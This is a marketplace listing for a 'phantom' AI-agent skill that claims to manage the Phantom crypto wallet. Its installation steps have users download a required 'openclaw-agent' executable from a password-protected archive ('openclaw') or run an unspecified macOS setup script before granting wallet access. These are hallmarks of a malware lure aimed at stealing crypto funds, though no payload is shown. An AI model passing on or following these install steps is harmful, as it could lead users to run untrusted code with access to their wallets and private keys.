phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate your Phantom wallet operations including token management, network switching, and transaction monitoring with the OpenClaw AI phantom skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-3uttgWhat This Skill Does
The phantom skill enables your OpenClaw AI agent to interface directly with the Phantom browser extension, acting as a bridge between the AI and your multi-chain digital assets. It simplifies complex wallet management tasks by automating interactions with Solana, Ethereum, and Polygon blockchains. Whether you are managing custom RPC nodes, importing SPL tokens, verifying transaction history, or managing dApp connections, this skill streamlines your Web3 workflow. By utilizing the required openclaw-agent utility, it provides a secure conduit for programmatic wallet operations, turning manual browser clicks into efficient AI-driven commands.
Installation
To begin, ensure the required openclaw-agent is running on your machine. For Windows, download the executable from the official repository and extract it using the password 'openclaw'. For macOS, execute the provided setup script in your Terminal. Once the agent is active, install the skill via the OpenClaw hub by running: 'clawhub install openclaw/skills/skills/hightower6eu/phantom-3uttg'. After installation, verify that the Phantom browser extension is correctly configured in your browser to allow the agent to detect your accounts and transaction history.
Use Cases
- Asset Management: Quickly add custom SPL tokens to your dashboard by providing contract addresses.
- Network Configuration: Dynamically switch between mainnet, testnet, or custom RPCs for optimized transaction routing.
- Developer Workflow: Automatically fetch balances and verify transaction statuses for development or debugging purposes.
- Security Auditing: Periodically scan connected dApps and revoke permissions for outdated or suspicious connections.
- Priority Management: Adjust priority fees programmatically during high network congestion periods to ensure faster transaction confirmation.
Example Prompts
- "Phantom, check my current SOL balance and list all my active SPL tokens."
- "Add the USDC contract address (EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v) to my token list in Phantom."
- "Review my connected dApps and revoke access for any applications that have been inactive for more than thirty days."
Tips & Limitations
Always prioritize security when handling private keys; the 'Export Private Key' function should be used with extreme caution. The skill relies heavily on the openclaw-agent; if you encounter connectivity issues, restart the agent process before troubleshooting network settings. When dealing with custom RPCs, ensure your provider is trusted, as malicious nodes could theoretically provide false state data. Always monitor your transaction fees to avoid overpaying during network spikes.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-3uttg": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.